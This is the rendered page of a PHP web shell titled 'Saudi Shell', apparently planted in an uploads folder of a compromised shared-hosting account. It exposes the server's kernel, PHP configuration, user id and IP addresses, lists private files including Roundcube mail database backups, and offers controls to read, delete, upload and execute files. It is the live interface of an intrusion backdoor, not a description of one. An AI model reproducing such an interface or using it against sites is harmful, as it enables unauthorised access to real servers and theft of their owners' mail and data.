Saudi Shell
OS : Linux cld21.cloud-servers.net 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64   [ Google ]   [ exploit-db ]
safe_mode: OFF
disable_functions : exec,passthru,shell_exec,system
Server : Apache
PHP version : 8.1.34
Id : user = w0323med | uid= 1087 | gid= 1089
Pwd : /home/w0323med/public_html/uploads/meetnvisit  drwxr-xr-x  [ Home ]


Your ip : 216.73.216.1    | ip server : 37.27.141.47 |  list site |  phpinfo |

Your path :  /home/w0323med/etc/

NameSizeModifyOwner/GroupPermissionsOption
[ . ]dir2026-02-17 03:58:15w0323med/maildrwxr-x---   0750R - C - rm
[ .. ]dir2025-04-17 02:32:21w0323med/w0323meddrwx--x--x   0711R - C - rm
[ medinetpharma.com ]dir2026-02-17 03:58:15w0323med/maildrwxr-x---   0750R - C - rm
cacheid0.012023-03-06 07:44:56w0323med/w0323med-rw-r--r--   0644E - R - C - D - rm
ftpquota0.002024-04-29 06:55:35w0323med/w0323med-rw-r--r--   0644E - R - C - D - rm
w0323med.rcube.db476.002024-12-28 16:15:47w0323med/w0323med-rw-------   0600E - R - C - D - rm
w0323med.rcube.db.1748919492476.002025-06-03 02:58:12w0323med/w0323med-rw-------   0600E - R - C - D - rm
w0323med.rcube.db.1757473094476.002025-09-10 02:58:14w0323med/w0323med-rw-------   0600E - R - C - D - rm
w0323med.rcube.db.1760669892476.002025-10-17 02:58:12w0323med/w0323med-rw-------   0600E - R - C - D - rm
w0323med.rcube.db.1765771133476.002025-12-15 03:58:53w0323med/w0323med-rw-------   0600E - R - C - D - rm
w0323med.rcube.db.1767758292476.002026-01-07 03:58:12w0323med/w0323med-rw-------   0600E - R - C - D - rm
w0323med.rcube.db.1771300695476.002026-02-17 03:58:15w0323med/w0323med-rw-------   0600E - R - C - D - rm
w0323med.rcube.db.latest476.002026-02-17 03:58:15w0323med/w0323med-rw-------   0600E - R - C - D - rm




Change dir :
Make dir :
read file :
Make file :
Execute :
Upload file :